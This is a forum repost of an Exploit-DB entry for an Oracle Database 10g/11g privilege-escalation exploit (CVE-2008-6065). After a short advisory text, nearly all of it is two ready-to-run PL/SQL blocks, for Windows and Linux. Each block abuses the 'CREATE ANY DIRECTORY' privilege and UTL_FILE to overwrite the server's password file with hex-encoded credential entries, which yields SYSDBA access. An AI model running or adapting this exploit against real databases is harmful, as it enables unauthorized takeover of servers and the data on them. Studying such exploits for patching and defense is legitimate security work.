Exploit Oracle Database Server 11.1 - 'CREATE ANY Directory' Privilege Escalation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32475
Проверка EDB
  1. Пройдено
Автор
PAUL M. WRIGHT
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2008-6065
Дата публикации
2008-10-13
SQL:
source: https://www.securityfocus.com/bid/31738/info

Oracle Database Server is prone to a privilege-escalation issue related to the 'CREATE ANY DIRECTORY' user privilege.

Attackers may exploit this issue to gain full SYSDBA privileges on the vulnerable database server.

This issue affects Oracle Database 10.1, 10.2, and 11g; additional versions may also be vulnerable.

--note windows adds 0D 0A to end as cTRL LF
--WINDOWS VERSION 10.1
DECLARE fi UTL_FILE.FILE_TYPE;
bu RAW(32767);
bu2 varchar2(32767);
bu3 varchar2(32767);
BEGIN
bu2:=hextoraw('000000000000000000000000000000000000000000020000020000005d5c5b5a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004f5241434c452052656d6f74652050617373776f72642066696c650000001b004f52434c000000000000000000000000000000000000000000000000000004000100000000000000000000000000000000000000000000000000000000000000494e5445524e414c000000000000000000000000000000000000000000000000080000003736394330434438343946394238423200000000000000000000000000000000100000000f000000000000000000000000000000000000000000000000000000000000005359530000000000000000000000000000000000000000000000000000000000030000003536333832323844414635323830354600000000000000000000000000000000100000000f');
bu3:=hextoraw('0000000000000000000000000000000000000000000000000000000000000000000000000000000782af445359534d414e0000000000000000000000000000000000000000000000000000060000004138443641453346343145463931454100000000000000000000000000000000100000000b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004344544553540000000000000000000000000000000000000000000000000000060000003134383041443332443038423045433900000000000000000000000000000000100000000b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000');
bu := hextoraw(bu2||bu3);
fi:=UTL_FILE.fopen('TESTPASS','PWDorcl.ora','w',32767);
UTL_FILE.put_raw(fi,bu,TRUE);
UTL_FILE.fclose(fi);
END;
/

--linux adds 0A as LF
--LINUX VERSION 10.2.0.1
DECLARE fi UTL_FILE.FILE_TYPE;
bu RAW(32767);
bu2 varchar2(32767);
bu3 varchar2(32767);
BEGIN
bu2:=hextoraw('000000000000000000000000000000000000000000020000020000005d5c5b5a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004f5241434c452052656d6f74652050617373776f72642066696c650000001b004f52434c000000000000000000000000000000000000000000000000000004000100000000000000000000000000000000000000000000000000000000000000494e5445524e414c000000000000000000000000000000000000000000000000080000003736394330434438343946394238423200000000000000000000000000000000100000000f000000000000000000000000000000000000000000000000000000000000005359530000000000000000000000000000000000000000000000000000000000030000003536333832323844414635323830354600000000000000000000000000000000100000000f');
bu3:=hextoraw('0000000000000000000000000000000000000000000000000000000000000000000000000000000782af445359534d414e0000000000000000000000000000000000000000000000000000060000004138443641453346343145463931454100000000000000000000000000000000100000000b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004344544553540000000000000000000000000000000000000000000000000000060000003134383041443332443038423045433900000000000000000000000000000000100000000b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000');
bu := hextoraw(bu2||bu3);
fi:=UTL_FILE.fopen('TESTPASS','orapworcl','w',32767);
UTL_FILE.put_raw(fi,bu,TRUE);
UTL_FILE.fclose(fi);
END;
/
 
Источник
www.exploit-db.com

Похожие темы